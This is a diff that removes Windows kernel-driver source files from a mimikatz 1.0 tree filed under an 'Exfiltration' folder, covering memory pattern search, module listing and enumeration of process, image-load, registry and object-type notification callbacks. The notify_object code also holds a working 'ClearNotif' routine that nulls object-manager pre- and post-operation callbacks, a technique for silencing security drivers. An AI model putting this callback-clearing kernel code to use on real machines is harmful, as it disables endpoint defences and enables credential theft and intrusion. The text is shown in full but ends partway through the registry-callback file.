NTSTATUS status = searchMemory(adresseBase, adresseMaxMin, pattern, addressePointeur, longueur);
if(NT_SUCCESS(status))
{
*addressePointeur += offsetTo;
#ifdef _M_X64
*addressePointeur += sizeof(LONG) + *(PLONG)(*addressePointeur);
#elif defined _M_IX86
*addressePointeur = *(PUCHAR *)(*addressePointeur);
#endif
if(!*addressePointeur)
status = STATUS_INVALID_HANDLE;
}
return status;
}

5
Exfiltration/mimikatz-1.0/driver/mod_memory.h
View File

@ -1,5 +0,0 @@
#pragma once
#include "k_types.h"
NTSTATUS searchMemory(const PUCHAR adresseBase, const PUCHAR adresseMaxMin, const PUCHAR pattern, PUCHAR *addressePattern, SIZE_T longueur);
NTSTATUS genericPointerSearch(PUCHAR *addressePointeur, const PUCHAR adresseBase, const PUCHAR adresseMaxMin, const PUCHAR pattern, SIZE_T longueur, LONG offsetTo);

110
Exfiltration/mimikatz-1.0/driver/modules.c
View File

@ -1,110 +0,0 @@
#include "modules.h"
NTSTATUS kModulesList(LPWSTR pszDest, size_t cbDest, LPWSTR *ppszDestEnd, size_t *pcbRemaining)
{
NTSTATUS status = STATUS_SUCCESS;
ULONG i;
ULONG modulesSize;
AUX_MODULE_EXTENDED_INFO* modules;
ULONG numberOfModules;
*ppszDestEnd = pszDest;
*pcbRemaining= cbDest;
status = AuxKlibInitialize();
if(NT_SUCCESS(status))
{
status = AuxKlibQueryModuleInformation(&modulesSize, sizeof(AUX_MODULE_EXTENDED_INFO), NULL);
if (NT_SUCCESS(status))
{
if(modulesSize > 0)
{
numberOfModules = modulesSize / sizeof(AUX_MODULE_EXTENDED_INFO);
modules = (AUX_MODULE_EXTENDED_INFO*) ExAllocatePoolWithTag(PagedPool, modulesSize, POOL_TAG);
if(modules != NULL)
{
status = AuxKlibQueryModuleInformation(&modulesSize, sizeof(AUX_MODULE_EXTENDED_INFO), modules);
if (NT_SUCCESS(status))
{
for(i = 0; i < numberOfModules; i++)
{
status = RtlStringCbPrintfExW(*ppszDestEnd, *pcbRemaining, ppszDestEnd, pcbRemaining, STRSAFE_NO_TRUNCATION,
L"%p - %.8u [%S] %S\n",
modules[i].BasicInfo.ImageBase,
modules[i].ImageSize,
modules[i].FullPathName + modules[i].FileNameOffset,
modules[i].FullPathName
);
}
}
ExFreePoolWithTag(modules, POOL_TAG);
}
}
}
}
return status;
}
NTSTATUS getModuleFromAddr(ULONG_PTR theAddr, LPWSTR pszDest, size_t cbDest, LPWSTR *ppszDestEnd, size_t *pcbRemaining)
{
NTSTATUS status = STATUS_SUCCESS;
ULONG i;
ULONG modulesSize;
AUX_MODULE_EXTENDED_INFO* modules;
ULONG numberOfModules;
*ppszDestEnd = pszDest;
*pcbRemaining= cbDest;
status = AuxKlibInitialize();
if(NT_SUCCESS(status))
{
status = AuxKlibQueryModuleInformation(&modulesSize, sizeof(AUX_MODULE_EXTENDED_INFO), NULL);
if (NT_SUCCESS(status))
{
if(modulesSize > 0)
{
numberOfModules = modulesSize / sizeof(AUX_MODULE_EXTENDED_INFO);
modules = (AUX_MODULE_EXTENDED_INFO*) ExAllocatePoolWithTag(PagedPool, modulesSize, POOL_TAG);
if(modules != NULL)
{
status = AuxKlibQueryModuleInformation(&modulesSize, sizeof(AUX_MODULE_EXTENDED_INFO), modules);
if (NT_SUCCESS(status))
{
for(i = 0; i < numberOfModules; i++)
{
status = STATUS_NOT_FOUND;
if(theAddr >= (ULONG_PTR) modules[i].BasicInfo.ImageBase && theAddr < ((ULONG_PTR) modules[i].BasicInfo.ImageBase + modules[i].ImageSize))
{
status = RtlStringCbPrintfExW(*ppszDestEnd, *pcbRemaining, ppszDestEnd, pcbRemaining, STRSAFE_NO_TRUNCATION,
L"%p [%S+%u]",
theAddr,
modules[i].FullPathName + modules[i].FileNameOffset,
theAddr - (ULONG_PTR) modules[i].BasicInfo.ImageBase
);
break;
}
}
if(status == STATUS_NOT_FOUND)
{
status = RtlStringCbPrintfExW(*ppszDestEnd, *pcbRemaining, ppszDestEnd, pcbRemaining, STRSAFE_NO_TRUNCATION, L"%p [?]", theAddr);
if (NT_SUCCESS(status)) status = STATUS_NOT_FOUND;
}
}
ExFreePoolWithTag(modules, POOL_TAG);
}
}
}
}
return status;
}

7
Exfiltration/mimikatz-1.0/driver/modules.h
View File

@ -1,7 +0,0 @@
#pragma once
#include <ntddk.h>
#include <aux_klib.h>
#include "k_types.h"
NTSTATUS kModulesList(LPWSTR pszDest, size_t cbDest, LPWSTR *ppszDestEnd, size_t *pcbRemaining);
NTSTATUS getModuleFromAddr(ULONG_PTR theAddr, LPWSTR pszDest, size_t cbDest, LPWSTR *ppszDestEnd, size_t *pcbRemaining);

19
Exfiltration/mimikatz-1.0/driver/notify.h
View File

@ -1,19 +0,0 @@
#pragma once
#include <ntifs.h>
#include "k_types.h"
#include "modules.h"
#include "mod_memory.h"
#include "notify_process.h"
#include "notify_thread.h"
#include "notify_image.h"
#include "notify_reg.h"
#include "notify_object.h"
typedef struct _KIWI_CALLBACK
{
#ifdef _M_IX86
PVOID unk0;
#endif
PVOID * callback;
LARGE_INTEGER * opt_cookie; // structure de feignant pour les process;threads;images aussi
} KIWI_CALLBACK, *PKIWI_CALLBACK;

117
Exfiltration/mimikatz-1.0/driver/notify_image.c
View File

@ -1,117 +0,0 @@
#include "notify_image.h"
ULONG * PspLoadImageNotifyRoutineCount = NULL;
PVOID * PspLoadImageNotifyRoutine = NULL;
NTSTATUS kListNotifyImages(LPWSTR pszDest, size_t cbDest, LPWSTR *ppszDestEnd, size_t *pcbRemaining)
{
NTSTATUS status;
ULONG i;
PKIWI_CALLBACK monCallBack;
*ppszDestEnd = pszDest; *pcbRemaining= cbDest;
status = RtlStringCbPrintfExW(*ppszDestEnd, *pcbRemaining, ppszDestEnd, pcbRemaining, STRSAFE_NO_TRUNCATION, L"kListNotifyImages\n\n");
if(NT_SUCCESS(status))
{
status = getPspLoadImageNotifyRoutine();
if(NT_SUCCESS(status))
{
for(i = 0; (i < *PspLoadImageNotifyRoutineCount) && NT_SUCCESS(status); i++)
{
monCallBack = (PKIWI_CALLBACK) KIWI_mask3bits(PspLoadImageNotifyRoutine[i]);
if(monCallBack != NULL)
{
status = RtlStringCbPrintfExW(*ppszDestEnd, *pcbRemaining, ppszDestEnd, pcbRemaining, STRSAFE_NO_TRUNCATION, L"[%.2u] ", i);
if(NT_SUCCESS(status))
{
status = getModuleFromAddr((ULONG_PTR) monCallBack->callback, *ppszDestEnd, *pcbRemaining, ppszDestEnd, pcbRemaining);
if(NT_SUCCESS(status) || status == STATUS_NOT_FOUND)
{
status = RtlStringCbPrintfExW(*ppszDestEnd, *pcbRemaining, ppszDestEnd, pcbRemaining, STRSAFE_NO_TRUNCATION, L"\n");
}
}
}
}
}
}
return status;
}
NTSTATUS getPspLoadImageNotifyRoutine()
{
NTSTATUS retour = STATUS_NOT_FOUND;
#ifdef _M_X64
UCHAR PTRN_WNT5_Image[] = {0x48, 0x8d, 0x35};
LONG OFFS_WNT5_Image = sizeof(PTRN_WNT5_Image);
UCHAR PTRN_WNT6_Image[] = {0x48, 0x8d, 0x0d};
LONG OFFS_WNT6_Image = sizeof(PTRN_WNT6_Image);
LONG OFFS_WNT5_Count = - 0x0c;
LONG OFFS_WNT6_Count = sizeof(PVOID) * MAX_NT_PspLoadImageNotifyRoutine;
#elif defined _M_IX86
UCHAR PTRN_WNT5_Image[] = {0x6a, 0x00, 0x53, 0x56};
UCHAR PTRN_WNO8_Image[] = {0x6a, 0x00, 0x8b, 0xcb, 0x8b, 0xc6};
UCHAR PTRN_WIN8_Image[] = {0x33, 0xff, 0x6a, 0x00, 0x53, 0x8b, 0xc6};
LONG OFFS_WALL_Image = -(LONG) sizeof(PVOID);
LONG OFFS_WNT5_Count = - 0x18;
LONG OFFS_WNO8_Count = sizeof(PVOID) * MAX_NT_PspLoadImageNotifyRoutine;
LONG OFFS_WIN8_Count = - 0x20;
#endif
PUCHAR pointeur = NULL, pattern = NULL, refDebut = (PUCHAR) PsSetLoadImageNotifyRoutine, refFin = refDebut + PAGE_SIZE; SIZE_T taille = 0; LONG offsetTo = 0;
LONG offsetToCountEx = 0, offsetToCount = 0;
if(PspLoadImageNotifyRoutine && PspLoadImageNotifyRoutineCount)
{
retour = STATUS_SUCCESS;
}
else
{
if(INDEX_OS < INDEX_VISTA)
{
pattern = PTRN_WNT5_Image;
taille = sizeof(PTRN_WNT5_Image);
#ifdef _M_X64
offsetTo = OFFS_WNT5_Image;
#endif
offsetToCount = OFFS_WNT5_Count;
}
else
{
#ifdef _M_X64
pattern = PTRN_WNT6_Image;
taille = sizeof(PTRN_WNT6_Image);
offsetTo = OFFS_WNT6_Image;
offsetToCount = OFFS_WNT6_Count;
#elif defined _M_IX86
if(INDEX_OS < INDEX_8)
{
pattern = PTRN_WNO8_Image;
taille = sizeof(PTRN_WNO8_Image);
offsetToCount = OFFS_WNO8_Count;
}
else
{
pattern = PTRN_WIN8_Image;
taille = sizeof(PTRN_WIN8_Image);
offsetToCount = OFFS_WIN8_Count;
}
#endif
}
#ifdef _M_IX86
offsetTo = OFFS_WALL_Image;
#endif
retour = genericPointerSearch(&pointeur, refDebut, refFin, pattern, taille, offsetTo);
if(NT_SUCCESS(retour))
{
PspLoadImageNotifyRoutine = (PVOID) (pointeur);
PspLoadImageNotifyRoutineCount = (PULONG) (pointeur + offsetToCount);
if(PspLoadImageNotifyRoutine && PspLoadImageNotifyRoutineCount)
retour = STATUS_SUCCESS;
}
}
return retour;
}

10
Exfiltration/mimikatz-1.0/driver/notify_image.h
View File

@ -1,10 +0,0 @@
#pragma once
#include "notify.h"
#define MAX_NT_PspLoadImageNotifyRoutine 8
ULONG * PspLoadImageNotifyRoutineCount;
PVOID * PspLoadImageNotifyRoutine;
NTSTATUS getPspLoadImageNotifyRoutine();
NTSTATUS kListNotifyImages(LPWSTR pszDest, size_t cbDest, LPWSTR *ppszDestEnd, size_t *pcbRemaining);

173
Exfiltration/mimikatz-1.0/driver/notify_object.c
View File

@ -1,173 +0,0 @@
#include "notify_object.h"
POBJECT_DIRECTORY * ObpTypeDirectoryObject = NULL;
const WCHAR *procCallToName[] = {
L"Dump ",
L"Open ",
L"Close ",
L"Delete ",
L"Parse ",
L"Security ",
L"QueryName ",
L"OkayToClose",
};
NTSTATUS kListNotifyObjects(LPWSTR pszDest, size_t cbDest, LPWSTR *ppszDestEnd, size_t *pcbRemaining)
{
return listNotifyOrClearObjects(pszDest, cbDest, ppszDestEnd, pcbRemaining, ListNotif);
}
NTSTATUS kClearNotifyObjects(LPWSTR pszDest, size_t cbDest, LPWSTR *ppszDestEnd, size_t *pcbRemaining)
{
return listNotifyOrClearObjects(pszDest, cbDest, ppszDestEnd, pcbRemaining, ClearNotif);
}
NTSTATUS listNotifyOrClearObjects(LPWSTR pszDest, size_t cbDest, LPWSTR *ppszDestEnd, size_t *pcbRemaining, KIWI_NOTIF_OBJECT_ACTION action)
{
NTSTATUS status;
ULONG i, j;
POBJECT_DIRECTORY_ENTRY monEntree;
POBJECT_TYPE monType, monTypeDecal;
PVOID * miniProc;
POBJECT_CALLBACK_ENTRY pStruct;
*ppszDestEnd = pszDest; *pcbRemaining= cbDest;
status = RtlStringCbPrintfExW(*ppszDestEnd, *pcbRemaining, ppszDestEnd, pcbRemaining, STRSAFE_NO_TRUNCATION, L"kListNotifyObjects\n\n");
if(NT_SUCCESS(status))
{
status = getObpTypeDirectoryObject();
if(NT_SUCCESS(status))
{
for(i = 0; (i < OBJECT_HASH_TABLE_SIZE) && NT_SUCCESS(status); i++)
{
if((*ObpTypeDirectoryObject)->HashBuckets[i])
{
for(monEntree = (*ObpTypeDirectoryObject)->HashBuckets[i]; monEntree && NT_SUCCESS(status); monEntree = monEntree->NextEntry)
{
if(monType = monEntree->Object)
{
if(INDEX_OS < INDEX_VISTA)
monType = (POBJECT_TYPE) ((ULONG_PTR) (monType) + sizeof(ERESOURCE));
if(action == ListNotif)
{
status = RtlStringCbPrintfExW(*ppszDestEnd, *pcbRemaining, ppszDestEnd, pcbRemaining, STRSAFE_NO_TRUNCATION, L"\n%wZ\n", &(monType->Name));
for(j = 0; (j < 8) && NT_SUCCESS(status); j++)
{
miniProc = (PVOID *) (((ULONG_PTR) &(monType->TypeInfo)) + FIELD_OFFSET(OBJECT_TYPE_INITIALIZER, DumpProcedure) + sizeof(PVOID)*j
#ifdef _M_IX86
- ((INDEX_OS < INDEX_VISTA) ? sizeof(ULONG) : 0)
#endif
);
if(*miniProc)
{
status = RtlStringCbPrintfExW(*ppszDestEnd, *pcbRemaining, ppszDestEnd, pcbRemaining, STRSAFE_NO_TRUNCATION, L" - %ws : ", procCallToName[j]);
if(NT_SUCCESS(status))
{
status = getModuleFromAddr((ULONG_PTR) *miniProc, *ppszDestEnd, *pcbRemaining, ppszDestEnd, pcbRemaining);
if(NT_SUCCESS(status) || status == STATUS_NOT_FOUND)
{
status = RtlStringCbPrintfExW(*ppszDestEnd, *pcbRemaining, ppszDestEnd, pcbRemaining, STRSAFE_NO_TRUNCATION, L"\n");
}
}
}
}
}
if(INDEX_OS >= INDEX_VISTA)
{
if(INDEX_OS < INDEX_7)
monType = (POBJECT_TYPE) ((ULONG_PTR) (monType) + sizeof(ERESOURCE) + 32*sizeof(EX_PUSH_LOCK));
else if (INDEX_OS > INDEX_7)
monType = (POBJECT_TYPE) ((ULONG_PTR) (monType) + sizeof(ULONG) + 2*sizeof(USHORT)); // W8 : nouveaux champs avant les callbacks
for(pStruct = (POBJECT_CALLBACK_ENTRY) (monType->CallbackList.Flink) ; (pStruct != (POBJECT_CALLBACK_ENTRY) &(monType->CallbackList)) && NT_SUCCESS(status) ; pStruct = (POBJECT_CALLBACK_ENTRY) pStruct->CallbackList.Flink)
{
if(pStruct->PreOperation || pStruct->PostOperation)
{
status = RtlStringCbPrintfExW(*ppszDestEnd, *pcbRemaining, ppszDestEnd, pcbRemaining, STRSAFE_NO_TRUNCATION, L" * Callback %u : ", pStruct->Operations, pStruct->PreOperation);;
if(NT_SUCCESS(status))
{
status = getModuleFromAddr((ULONG_PTR) pStruct->PreOperation, *ppszDestEnd, *pcbRemaining, ppszDestEnd, pcbRemaining);
if(NT_SUCCESS(status) || status == STATUS_NOT_FOUND)
{
status = RtlStringCbPrintfExW(*ppszDestEnd, *pcbRemaining, ppszDestEnd, pcbRemaining, STRSAFE_NO_TRUNCATION, L" / ");
if(NT_SUCCESS(status))
{
status = getModuleFromAddr((ULONG_PTR) pStruct->PostOperation, *ppszDestEnd, *pcbRemaining, ppszDestEnd, pcbRemaining);
if(NT_SUCCESS(status) || status == STATUS_NOT_FOUND)
{
status = RtlStringCbPrintfExW(*ppszDestEnd, *pcbRemaining, ppszDestEnd, pcbRemaining, STRSAFE_NO_TRUNCATION, L"\n");
}
}
}
}
if(action == ClearNotif)
{
pStruct->PreOperation = NULL;
pStruct->PostOperation = NULL;
status = RtlStringCbPrintfExW(*ppszDestEnd, *pcbRemaining, ppszDestEnd, pcbRemaining, STRSAFE_NO_TRUNCATION, L" -> NULL !\n");
}
}
}
}
}
}
}
}
}
}
return status;
}
NTSTATUS getObpTypeDirectoryObject()
{
NTSTATUS retour = STATUS_NOT_FOUND;
#ifdef _M_X64
UCHAR PTRN_WALL_Object[] = {0x66, 0x83, 0xf8, 0x5c, 0x0f, 0x84};
LONG OFFS_WNT5_Object = sizeof(PTRN_WALL_Object) + 4 + 2 + 2 + 8 + 8 + 8 + 3;
LONG OFFS_WNO8_Object = sizeof(PTRN_WALL_Object) + 4 + 3 + 2 + 3;
LONG OFFS_WIN8_Object = sizeof(PTRN_WALL_Object) + 4 + 2 + 2 + 3;
#elif defined _M_IX86
UCHAR PTRN_WALL_Object[] = {0x5c, 0x0f, 0x84};
LONG OFFS_WNT5_Object = sizeof(PTRN_WALL_Object) + 4 + 2 + 2 + 2;
LONG OFFS_WNO8_Object = sizeof(PTRN_WALL_Object) + 4 + 2 + 2 + 1;
LONG OFFS_WIN8_Object = sizeof(PTRN_WALL_Object) + 4 + 2 + 2 + 2;
#endif
PUCHAR refDebut = NULL, refFin = NULL; LONG offsetTo = 0;
UNICODE_STRING maRoutine;
if(ObpTypeDirectoryObject)
{
retour = STATUS_SUCCESS;
}
else
{
RtlInitUnicodeString(&maRoutine, L"ObCreateObjectType");
if(refDebut = (PUCHAR) MmGetSystemRoutineAddress(&maRoutine))
{
refFin = refDebut + PAGE_SIZE;
if(INDEX_OS < INDEX_8)
{
if(INDEX_OS < INDEX_VISTA)
offsetTo = OFFS_WNT5_Object;
else
{
offsetTo = OFFS_WNO8_Object;
#ifdef _M_X64
refFin = refDebut - PAGE_SIZE;
#endif
}
}
else
offsetTo = OFFS_WIN8_Object;
retour = genericPointerSearch((PUCHAR *) &ObpTypeDirectoryObject, refDebut, refFin, PTRN_WALL_Object, sizeof(PTRN_WALL_Object), offsetTo);
}
}
return retour;
}

79
Exfiltration/mimikatz-1.0/driver/notify_object.h
View File

@ -1,79 +0,0 @@
#pragma once
#include "notify.h"
#define OBJECT_HASH_TABLE_SIZE 37
typedef struct _OBJECT_DIRECTORY_ENTRY {
struct _OBJECT_DIRECTORY_ENTRY *NextEntry;
PVOID Object;
ULONG HashValue; // pas en NT5
} OBJECT_DIRECTORY_ENTRY, *POBJECT_DIRECTORY_ENTRY;
typedef struct _OBJECT_DIRECTORY {
POBJECT_DIRECTORY_ENTRY HashBuckets[OBJECT_HASH_TABLE_SIZE];
EX_PUSH_LOCK Lock;
PVOID DeviceMap;
ULONG SessionId;
PVOID NamespaceEntry; // a partir de là, différent en NT5, mais pas utilisé...
ULONG Flags;
} OBJECT_DIRECTORY, *POBJECT_DIRECTORY;
typedef struct _OBJECT_TYPE_INITIALIZER // NT6, décaler ULONG en NT5x86 (compensé par l'alignement en x64)
{
SHORT Length;
UCHAR ObjectTypeFlags;
ULONG ObjectTypeCode;
ULONG InvalidAttributes;
GENERIC_MAPPING GenericMapping;
ACCESS_MASK ValidAccessMask;
ULONG RetainAccess;
POOL_TYPE PoolType;
ULONG DefaultPagedPoolCharge;
ULONG DefaultNonPagedPoolCharge;
PVOID DumpProcedure;
PVOID OpenProcedure;
PVOID CloseProcedure;
PVOID DeleteProcedure;
PVOID ParseProcedure;
PVOID SecurityProcedure;
PVOID QueryNameProcedure;
PVOID OkayToCloseProcedure;
} OBJECT_TYPE_INITIALIZER, *POBJECT_TYPE_INITIALIZER;
typedef struct _OBJECT_TYPE {
LIST_ENTRY TypeList;
UNICODE_STRING Name;
PVOID DefaultObject;
UCHAR Index;
ULONG TotalNumberOfObjects;
ULONG TotalNumberOfHandles;
ULONG HighWaterNumberOfObjects;
ULONG HighWaterNumberOfHandles;
OBJECT_TYPE_INITIALIZER TypeInfo;
EX_PUSH_LOCK TypeLock;
ULONG Key;
LIST_ENTRY CallbackList;
} OBJECT_TYPE, *POBJECT_TYPE;
typedef struct _OBJECT_CALLBACK_ENTRY {
LIST_ENTRY CallbackList;
OB_OPERATION Operations;
ULONG Active;
/*OB_HANDLE*/ PVOID Handle;
POBJECT_TYPE ObjectType;
POB_PRE_OPERATION_CALLBACK PreOperation;
POB_POST_OPERATION_CALLBACK PostOperation;
} OBJECT_CALLBACK_ENTRY, *POBJECT_CALLBACK_ENTRY;
typedef enum _KIWI_NOTIF_OBJECT_ACTION
{
ListNotif,
ClearNotif
} KIWI_NOTIF_OBJECT_ACTION;
POBJECT_DIRECTORY * ObpTypeDirectoryObject;
NTSTATUS getObpTypeDirectoryObject();
NTSTATUS kListNotifyObjects(LPWSTR pszDest, size_t cbDest, LPWSTR *ppszDestEnd, size_t *pcbRemaining);
NTSTATUS kClearNotifyObjects(LPWSTR pszDest, size_t cbDest, LPWSTR *ppszDestEnd, size_t *pcbRemaining);
NTSTATUS listNotifyOrClearObjects(LPWSTR pszDest, size_t cbDest, LPWSTR *ppszDestEnd, size_t *pcbRemaining, KIWI_NOTIF_OBJECT_ACTION action);

137
Exfiltration/mimikatz-1.0/driver/notify_process.c
View File

@ -1,137 +0,0 @@
#include "notify_process.h"
ULONG * PspCreateProcessNotifyRoutineCount = NULL;
ULONG * PspCreateProcessNotifyRoutineExCount = NULL;
PVOID * PspCreateProcessNotifyRoutine = NULL;
NTSTATUS kListNotifyProcesses(LPWSTR pszDest, size_t cbDest, LPWSTR *ppszDestEnd, size_t *pcbRemaining)
{
NTSTATUS status;
ULONG i;
PKIWI_CALLBACK monCallBack;
ULONG bonusCount;
*ppszDestEnd = pszDest; *pcbRemaining= cbDest;
status = RtlStringCbPrintfExW(*ppszDestEnd, *pcbRemaining, ppszDestEnd, pcbRemaining, STRSAFE_NO_TRUNCATION, L"kListNotifyProcesses\n\n");
if(NT_SUCCESS(status))
{
status = getPspCreateProcessNotifyRoutine();
if(NT_SUCCESS(status))
{
bonusCount = *PspCreateProcessNotifyRoutineCount + ((INDEX_OS < INDEX_VISTA) ? 0 : *PspCreateProcessNotifyRoutineExCount);
for(i = 0; (i < bonusCount) && NT_SUCCESS(status) ; i++)
{
monCallBack = (PKIWI_CALLBACK) KIWI_mask3bits(PspCreateProcessNotifyRoutine[i]);
if(monCallBack != NULL)
{
status = RtlStringCbPrintfExW(*ppszDestEnd, *pcbRemaining, ppszDestEnd, pcbRemaining, STRSAFE_NO_TRUNCATION, L"[%.2u] ", i);
if(NT_SUCCESS(status))
{
status = getModuleFromAddr((ULONG_PTR) monCallBack->callback, *ppszDestEnd, *pcbRemaining, ppszDestEnd, pcbRemaining);
if(NT_SUCCESS(status) || status == STATUS_NOT_FOUND)
{
status = RtlStringCbPrintfExW(*ppszDestEnd, *pcbRemaining, ppszDestEnd, pcbRemaining, STRSAFE_NO_TRUNCATION, L"\n");
}
}
}
}
}
}
return status;
}
NTSTATUS getPspCreateProcessNotifyRoutine()
{
NTSTATUS retour = STATUS_NOT_FOUND;
#ifdef _M_X64
UCHAR PTRN_WNT5_Process[] = {0x41, 0xbc, 0x08, 0x00, 0x00, 0x00, 0x48, 0x8b, 0xeb};
LONG OFFS_WNT5_Process = -4;
UCHAR PTRN_WNO8_Process[] = {0x40, 0xc0, 0xed, 0x02, 0x41, 0x22, 0xee, 0xa8, 0x02, 0x0f, 0x84};
LONG OFFS_WNO8_Process = sizeof(PTRN_WNO8_Process) + 4 + 3;
UCHAR PTRN_WIN8_Process[] = {0x40, 0xc0, 0xee, 0x02, 0x41, 0x22, 0xf6, 0xa8, 0x02, 0x0f, 0x84};
LONG OFFS_WIN8_Process = sizeof(PTRN_WIN8_Process) + 4 + 3;
PUCHAR REF_D_WNO8_Process = (PUCHAR) CcMdlRead;
PUCHAR REF_F_WNO8_Process = REF_D_WNO8_Process - 25*PAGE_SIZE;
PUCHAR REF_D_WIN8_Process = (PUCHAR) SeImpersonateClientEx;
PUCHAR REF_F_WIN8_Process = REF_D_WIN8_Process + 25*PAGE_SIZE;
LONG OFFS_WNO8_CountEx = sizeof(PVOID) * MAX_NT6_PspCreateProcessNotifyRoutine;
LONG OFFS_WIN8_CountEx = OFFS_WNO8_CountEx;
LONG OFFS_WNT5_Count = sizeof(PVOID) * MAX_NT5_PspCreateProcessNotifyRoutine;
LONG OFFS_WNO8_Count = OFFS_WNO8_CountEx + sizeof(ULONG);
LONG OFFS_WIN8_Count = - 0x18;
#elif defined _M_IX86
UCHAR PTRN_WNT5_Process[] = {0x56, 0x57, 0x74};
LONG OFFS_WNT5_Process = sizeof(PTRN_WNT5_Process) + 2;
UCHAR PTRN_WNO8_Process[] = {0x33, 0xdb, 0xc7, 0x45};
LONG OFFS_WNO8_Process = sizeof(PTRN_WNO8_Process) + 1;
UCHAR PTRN_WIN8_Process[] = {0x33, 0xdb, 0x89, 0x5d, 0x0c, 0xbe};
LONG OFFS_WIN8_Process = sizeof(PTRN_WIN8_Process);
PUCHAR REF_D_WNO8_Process = (PUCHAR) PsSetCreateProcessNotifyRoutine;
PUCHAR REF_F_WNO8_Process = REF_D_WNO8_Process + 25*PAGE_SIZE;
PUCHAR REF_D_WIN8_Process = (PUCHAR) IoConnectInterrupt;
PUCHAR REF_F_WIN8_Process = REF_D_WIN8_Process - 25*PAGE_SIZE;
LONG OFFS_WNO8_CountEx = sizeof(PVOID) * MAX_NT6_PspCreateProcessNotifyRoutine;
LONG OFFS_WIN8_CountEx = - 0x20;
LONG OFFS_WNT5_Count = sizeof(PVOID) * MAX_NT5_PspCreateProcessNotifyRoutine;
LONG OFFS_WNO8_Count = OFFS_WNO8_CountEx + sizeof(ULONG);
LONG OFFS_WIN8_Count = OFFS_WIN8_CountEx - sizeof(ULONG);
#endif
PUCHAR pointeur = NULL, pattern = NULL, refDebut = NULL, refFin = NULL; SIZE_T taille = 0; LONG offsetTo = 0;
LONG offsetToCountEx = 0, offsetToCount = 0;
if(PspCreateProcessNotifyRoutine && ((INDEX_OS < INDEX_VISTA) || PspCreateProcessNotifyRoutineExCount) && PspCreateProcessNotifyRoutineCount)
{
retour = STATUS_SUCCESS;
}
else
{
if(INDEX_OS < INDEX_8)
{
if(INDEX_OS < INDEX_VISTA)
{
pattern = PTRN_WNT5_Process;
taille = sizeof(PTRN_WNT5_Process);
offsetTo = OFFS_WNT5_Process;
offsetToCount = OFFS_WNT5_Count;
}
else
{
pattern = PTRN_WNO8_Process;
taille = sizeof(PTRN_WNO8_Process);
offsetTo = OFFS_WNO8_Process;
offsetToCountEx = OFFS_WNO8_CountEx;
offsetToCount = OFFS_WNO8_Count;
}
refDebut = REF_D_WNO8_Process;
refFin = REF_F_WNO8_Process;
}
else
{
pattern = PTRN_WIN8_Process;
taille = sizeof(PTRN_WIN8_Process);
offsetTo = OFFS_WIN8_Process;
refDebut = REF_D_WIN8_Process;
refFin = REF_F_WIN8_Process;
offsetToCountEx = OFFS_WIN8_CountEx;
offsetToCount = OFFS_WIN8_Count;
}
retour = genericPointerSearch(&pointeur, refDebut, refFin, pattern, taille, offsetTo);
if(NT_SUCCESS(retour))
{
PspCreateProcessNotifyRoutine = (PVOID) (pointeur);
PspCreateProcessNotifyRoutineCount = (PULONG) (pointeur + offsetToCount);
if(INDEX_OS >= INDEX_VISTA)
PspCreateProcessNotifyRoutineExCount = (PULONG) (pointeur + offsetToCountEx);
if(PspCreateProcessNotifyRoutine && ((INDEX_OS < INDEX_VISTA) || PspCreateProcessNotifyRoutineExCount) && PspCreateProcessNotifyRoutineCount)
retour = STATUS_SUCCESS;
}
}
return retour;
}

12
Exfiltration/mimikatz-1.0/driver/notify_process.h
View File

@ -1,12 +0,0 @@
#pragma once
#include "notify.h"
#define MAX_NT6_PspCreateProcessNotifyRoutine 64
#define MAX_NT5_PspCreateProcessNotifyRoutine 8
ULONG * PspCreateProcessNotifyRoutineCount;
ULONG * PspCreateProcessNotifyRoutineExCount;
PVOID * PspCreateProcessNotifyRoutine;
NTSTATUS getPspCreateProcessNotifyRoutine();
NTSTATUS kListNotifyProcesses(LPWSTR pszDest, size_t cbDest, LPWSTR *ppszDestEnd, size_t *pcbRemaining);

137
Exfiltration/mimikatz-1.0/driver/notify_reg.c
View File

@ -1,137 +0,0 @@
#include "notify_reg.h"
ULONG * CmpCallBackCount = NULL;
PVOID * CmpCallBackVector = NULL;
PLIST_ENTRY CallbackListHead = NULL;
NTSTATUS kListNotifyRegistry(LPWSTR pszDest, size_t cbDest, LPWSTR *ppszDestEnd, size_t *pcbRemaining)
{
NTSTATUS status;
ULONG i;
PKIWI_CALLBACK monCallBack;
PLIST_ENTRY maListe;
PKIWI_REGISTRY6_CALLBACK monCallBack6;
*ppszDestEnd = pszDest; *pcbRemaining= cbDest;
status = RtlStringCbPrintfExW(*ppszDestEnd, *pcbRemaining, ppszDestEnd, pcbRemaining, STRSAFE_NO_TRUNCATION, L"kListNotifyRegistry\n\n");
if(NT_SUCCESS(status))
{
status = getNotifyRegistryRoutine();
if(NT_SUCCESS(status))
{
if(INDEX_OS < INDEX_VISTA)
{
for(i = 0; (i < *CmpCallBackCount) && NT_SUCCESS(status) ; i++)
{
monCallBack = (PKIWI_CALLBACK) KIWI_mask3bits(CmpCallBackVector[i]);
if(monCallBack != NULL)
{
status = RtlStringCbPrintfExW(*ppszDestEnd, *pcbRemaining, ppszDestEnd, pcbRemaining, STRSAFE_NO_TRUNCATION, L"[%.2u] ", i);
if(NT_SUCCESS(status))
{
status = getModuleFromAddr((ULONG_PTR) monCallBack->callback, *ppszDestEnd, *pcbRemaining, ppszDestEnd, pcbRemaining);
if(NT_SUCCESS(status) || status == STATUS_NOT_FOUND)
{
status = RtlStringCbPrintfExW(*ppszDestEnd, *pcbRemaining, ppszDestEnd, pcbRemaining, STRSAFE_NO_TRUNCATION,
L" - cookie %#.I64x\n", *(monCallBack->opt_cookie)
);
}
}
}
}
}
else
{
for(maListe = CallbackListHead->Flink, i = 0; (maListe != CallbackListHead) && NT_SUCCESS(status) ; maListe = maListe->Flink, i++)
{
monCallBack6 = (PKIWI_REGISTRY6_CALLBACK) (((ULONG_PTR) maListe) + sizeof(LIST_ENTRY) + 2*((INDEX_OS < INDEX_7) ? sizeof(PVOID) : sizeof(ULONG)));
status = RtlStringCbPrintfExW(*ppszDestEnd, *pcbRemaining, ppszDestEnd, pcbRemaining, STRSAFE_NO_TRUNCATION, L"[%.2u] ", i);
if(NT_SUCCESS(status))
{
status = getModuleFromAddr((ULONG_PTR) monCallBack6->callback, *ppszDestEnd, *pcbRemaining, ppszDestEnd, pcbRemaining);
if(NT_SUCCESS(status) || status == STATUS_NOT_FOUND)
{
status = RtlStringCbPrintfExW(*ppszDestEnd, *pcbRemaining, ppszDestEnd, pcbRemaining, STRSAFE_NO_TRUNCATION,
L" - alt %wZ - cookie %#.I64x\n", &(monCallBack6->altitude), monCallBack6->cookie);
}
}
}
}
}
}
